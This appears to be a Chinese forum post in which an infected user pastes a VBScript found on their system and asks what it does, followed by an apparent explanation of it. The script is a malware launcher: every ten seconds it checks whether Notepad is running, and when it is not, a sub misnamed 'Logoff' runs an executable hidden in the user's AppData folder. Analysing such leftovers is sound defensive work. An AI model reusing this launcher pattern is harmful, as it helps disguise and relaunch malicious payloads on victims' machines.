我想先说对不起,
这可能是问这些事情的最好的地方,但我被病毒感染了,似乎留下了痕迹。
如果有人能理解一些脚本背后的代码,我将非常感激。
Option Explicit
Dim ProcessPath,WshShell
ProcessPath = "%Windir%\System32\Notepad.exe"
Set WshShell = CreateObject("WScript.Shell")
If AppPrevInstance() Then
MsgBox "There is an existing proceeding !" & VbCrLF &_
CommandLineLike(WScript.ScriptName),VbExclamation,"There is an existing proceeding !"
WScript.Quit
Else
Do
Pause(10) ' Pause 10 seconds
If CheckProcess(DblQuote(ProcessPath)) = False Then
Call Logoff()
End If
Loop
End If
'**************************************************************************
Function CheckProcess(ProcessPath)
Dim strComputer,objWMIService,colProcesses,Tab,ProcessName
strComputer = "."
Tab = Split(ProcessPath,"\")
ProcessName = Tab(UBound(Tab))
ProcessName = Replace(ProcessName,Chr(34),"")
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colProcesses = objWMIService.ExecQuery _
("Select * from Win32_Process Where Name = '"& ProcessName & "'")
If colProcesses.Count = 0 Then
CheckProcess = False
Else
CheckProcess = True
End if
End Function
'**************************************************************************
Function DblQuote(Str)
DblQuote = Chr(34) & Str & Chr(34)
End Function
'**************************************************************************
Sub Logoff()
Dim objShell
Set objShell = WScript.CreateObject( "WScript.Shell" )
objShell.Exec("C:\Users\Sblck\AppData\Local\AppVShNotifyt.exe")
Set objShell = Nothing
Wscript.Quit
End sub
'**************************************************************************
Sub Pause(Secs)
Wscript.Sleep(Secs * 1000)
End Sub
'**************************************************************************
Function AppPrevInstance()
With GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\root\cimv2")
With .ExecQuery("SELECT * FROM Win32_Process WHERE CommandLine LIKE " & CommandLineLike(WScript.ScriptFullName) & _
" AND CommandLine LIKE '%WScript%' OR CommandLine LIKE '%cscript%'")
AppPrevInstance = (.Count > 1)
End With
End With
End Function
'***************************************************************************
Function CommandLineLike(ProcessPath)
ProcessPath = Replace(ProcessPath, "\", "\\")
CommandLineLike = "'%" & ProcessPath & "%'"
End Function
'****************************************************************************
我希望我正确格式化代码,有一些其他脚本,但是以txt形式,不同之处在于objShell.Exec它会调用“%working%”,如下所示:
objShell.Exec("%working%")^
如果它更容易,我会发布它的pastebin's
首先,它检查前一个实例,以查看当前脚本是否已使用另一个进程ID运行。
然后,每隔10秒检查记事本是否正在运行。如果不是,则调用AppVShNotifyt.exe